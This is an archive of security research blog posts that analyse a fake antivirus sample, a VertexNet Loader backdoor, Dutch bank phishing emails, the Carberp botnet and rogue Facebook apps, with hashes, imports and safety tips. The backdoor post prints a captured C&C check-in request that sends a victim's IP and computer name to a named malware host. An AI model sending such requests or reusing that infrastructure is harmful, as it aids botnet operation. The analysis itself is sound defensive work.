MalwareDisasters is a division of MalwareIntelligence. In the same test information is captured about the behavior of malicious code, and also offering the necessary countermeasures to mitigate the malicious actions in question.

7.13.2012

New variant of another fake antivirus program called Live Security Platinum


This is the icon used for the fakeAV


Technical information & PE file attribute
MD5 :  8ed72a01f6dd01cf353091492d7e96c6
SHA1:  a810430d6d26e97b1a8b48898d8effe4ed8a140e
['Microsoft Visual C++ v6.0'], ['Microsoft Visual C++ 5.0'], ['Microsoft Visual C++'], ['Microsoft Visual C++ v6.0'], ['Installer VISE Custom']


PE information & sections:      
      Win32 Executable MS Visual C++ (generic) (65.2%)
      Win32 Executable Generic (14.7%)
      Win32 Dynamic Link Library (generic) (13.1%)
      Generic Win/DOS Executable (3.4%)
      DOS Executable Generic (3.4%)


     Optional Header: 0x400000
     Address Of Entry Point: 0x1953
     Compile Time: 2012-07-12 09:06:36
     Number of RVA and Sizes: 16
     Number of Sections: 4


Imported DLLs and API:
[1] KERNEL32.dll     
     0x407000 Sleep
     0x407004 CloseHandle
     0x407008 GetProcAddress
     0x40700c GetModuleHandleA
     0x407010 InterlockedExchange
     0x407014 SetEvent
     0x407018 CreateFileA
     0x40701c VirtualAllocEx
     0x407020 LCMapStringA
     0x407024 GetStringTypeW
     0x407028 GetStringTypeA
     0x40702c MultiByteToWideChar
     0x407030 RaiseException
     0x407034 LoadLibraryA
     0x407038 GetOEMCP
     0x40703c GetStartupInfoA
     0x407040 GetCommandLineA
     0x407044 GetVersion
     0x407048 ExitProcess
     0x40704c HeapFree
     0x407050 TerminateProcess
     0x407054 GetCurrentProcess
     0x407058 UnhandledExceptionFilter
     0x40705c GetModuleFileNameA
     0x407060 FreeEnvironmentStringsA
     0x407064 FreeEnvironmentStringsW
     0x407068 WideCharToMultiByte
     0x40706c GetEnvironmentStrings
     0x407070 GetEnvironmentStringsW
     0x407074 SetHandleCount
     0x407078 GetStdHandle
     0x40707c GetFileType
     0x407080 HeapDestroy
     0x407084 HeapCreate
     0x407088 VirtualFree
     0x40708c RtlUnwind
     0x407090 WriteFile
     0x407094 HeapAlloc
     0x407098 VirtualAlloc
     0x40709c HeapReAlloc
     0x4070a0 GetCPInfo
     0x4070a4 GetACP
     0x4070a8 LCMapStringW
[2] USER32.dll       
     0x4070b0 LoadBitmapA
     0x4070b4 ShowWindow
     0x4070b8 LoadImageA
     0x4070bc LoadIconA
[3] WINMM.dll        
     0x4070c4 mixerGetControlDetailsA


VT information about detection rate 22/42


Live Security Platinum screenshots
Warning popups


Live Security Platinum GUI:





Live Security Platinum monetization

Live Security Platinum registration

** Information obtained through the automated process malware analysis of CrimewareAttack Service(by  MalwareIntelligence).

Alex



Ver más

7.06.2012

Generic trojan type backdoor via popular crimeware “Loader”

This is the icon used for this malware.


Technical information & PE file attribute
MD5 :  aab21e11953aee66ff16772576ceaec0
SHA1:  576910d3ae484144db32dd835594c605dac90a9d
[['Microsoft Visual C++ 8'], ['VC8 -> Microsoft Corporation']


This malware was created and is spread through crimeware "VertexNet Loader".


PE information & sections:
     57.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
     12.2% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)
     12.0% (.EXE) Win32 Executable Generic (6514/8/2)
     10.3% (.EXE) Win64 Executable Generic (5563/38/1)
     3.7% (.EXE) Generic Win/DOS Executable (2002/3)


Mutex: VN_MUTEX16
Optional Header: 0x400000
Address Of Entry Point: 0xaf4a
Compile Time: 2011-06-20 11:05:05
Number of RVA and Sizes: 16
Number of Sections: 5


API Functions:

     InternetReadFile
     CreateProcess
     WinExec
     ShellExecute
     URLDownloadToFileA

VT information about detection rate 35/42 


VN_MUTEX16 is the string that is set as default "mutex" through internal constructor VertexNet Loader:

This information corresponds to the default settings when creating the bot through the internal constructor:


Information report in the C&C statistics panel about infected machine:


This information is inserted into the database (default MySQL) of the crimeware. You can see this information/C&C communication in traffic capture:

GET /x1/adduser.php?uid={52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}
&lan=XXX.XXX.XXX.XXX&cmpname=XXXXXXXXXX-59903E%20[Administrator]&country= &idle=0&ver=v1.2 HTTP/1.1
User-Agent: V32
Host: tinker.vn

You can read more information about the functions, command and extract data in infected machine for this crimeware in MalwareIntelligence post: VertexNetLoader crimeware timeline, popular functions and marketing scheme


VertexNet Loader crimeware C&C
In this case, the malicious software have you control panel in hxxp://tinker.vn/x1/


** Information obtained through the automated process malware analysis of CrimewareAttack Service (by  MalwareIntelligence).

Alex

Ver más

4.12.2011

Increase in Dutch banking phishing

The last few months there was an increase in a phishing campaign targeted on customers from Rabobank and ING, two major banks in The Netherlands and Belgium. Some examples of a phishing mail:

Phishing email for ING with the subject “Account Verificatie” (or in English: “Account Verification”)


Phishing email for Rabobank with the subject “Customer Services Update”.

If you speak the Dutch language, you notice the content of the emails are actually more different than most phishing mails. In fact there’s a bigger variety, and in the first version there is almost no grammatical or spelling error. The second email - for Rabobank- however, is clearly a Google Translate copy/paste job.

All emails seem to be originating from valid email addresses, domains are pointing to @rabobank.nl and @ing.nl , which are in fact legitimate addresses from the two banks.
However, if we check the message headers we can see IP’s originating from Nigeria:

41.155.32.70IPVoid results
82.128.38.67IPVoid results

Another IP address is originating from New Zealand and is actually blacklisted on several blacklists, as can be confirmed when checking with IPVoid:

203.97.33.68IPVoid results

This means the email-addresses are spoofed to trick users into believing the email is valid.
Now, what happens if you click on the link included in the message?  You will be redirected to any of these pages:

Phishing website for ING. The user needs to login with his/her username and password. You can also opt to login with the ‘calculator’. The calculator is in fact a card reader which you can use to login.


Phishing website for Rabobank.  You can login using your account number, access code, and PIN code. You can also use your card reader.

The intention of these emails is of course to steal user credentials and empty the account of the duped user. These attacks are pretty well orchestrated. If you click on any of the links on the phishing page, it will redirect you to the real ING website which provides extra information on the topic you clicked on.

The following tips do not only apply to the above story, but apply to any other (suspicious) email you receive:
  • Do not click on any of the links (or anything for that matter) in the email you have received.
  • Do not reply to the email.
  • Delete the email immediately, certainly if you are not a customer of the aforementioned bank or did not order anything, changed your password, and so on.
  • If you really need to access or check your bank account, visit the website directly by typing the address in your browser’s address bar. Also verify the URL starts with https instead of http.
  • Another useful trick is to hover over the link in the email. In the bottom left corner you should be able to see the real address behind the URL displayed.
  • When in doubt, you can double-check using URL scanning services such as VirusTotal or URLVoid by our partner NoVirusThanks.

MalwareIntelligence Team

Ver más

2.21.2011

New whitepaper about Carberp Botnet

Is available a new whitepaper that describes the operation of one of the botnets "wanted" by the security community: Carberp.

The article, called Inside Carberp Botnet and written by Francisco Ruiz, Crimeware Research of MalwareIntelligence, details the different parts of this crimeware, leaving evidence of its full operating mode.

In recent weeks, has returned to Carberp impact due to the revival of several of his former C&C. However, experts believe MalwareIntelligence have concrete evidence that would demonstrate that in fact the original group that was behind the first generation of Carberp is broken, and that some of the new botnets that spread banking trojan Carberp are managed through a modified version of the original.

MalwareIntelligence have a Carberp Working Group, responsible for private research and demand of this particular threat. In the main blog, Ruiz also said that a botnet Carberp private market in a very closed environment, but since a few days ago, the marketing model has been released, giving some details of its current features and costs.

Ver más

2.14.2011

Facebook rogue applications still lurking around

For quite some time now there are rogue applications  trying to convince you that you are able to check whoever viewed your profile. There are a lot of different names for this rogue application, some but not all include:

  • creep exterminators
  • catch them being creepy
  • creepy profile peekers
  • privacy bros
  • we catch stalkers
So what will this fake application do? For starters, it will surely NOT show you who's been viewing your profile.  If you land on this application, you will be presented with the following screen:

Profile Creeps application

Request for permission

You then have to allow access from the application so they can show you who's been lurking around your profile. But wait ! You first have to complete a survey and then you are able to check it out. Simple, right?

Facebook verification

Not exactly. These fake surveys are pretty common on the internet. It is a typical scam. For example, I had one particular survey that urged me to download SmileyCentral, the other tried to deliver me Webfetti.

Another fake survey wanted me to fill in my phone number, and afterwards send an (expensive) text message to 'unlock' the application. In addition to letting you fall into one of these scams, the rogue application also promotes itself on all of your friends’ walls:





Rogue application spreading itself on other people’s wall


If you would like to remove it, follow the steps below:
  • Go to your Facebook profile. Find the post that mentions the "stalker" application
  • Skim over it and you will see an X appear. Click on it and choose "Remove (name of the fake application here)".
  • Additionally, you can also report it as abusive to help in stopping these type of applications.
  • Next step is to click on My Account and choose Privacy Settings. Down below you can see "Apps and websites". Click on Edit your settings.
  • Select Remove unwanted or spammy apps. You can now Edit the application and remove it.

MalwareIntelligence Team

Ver más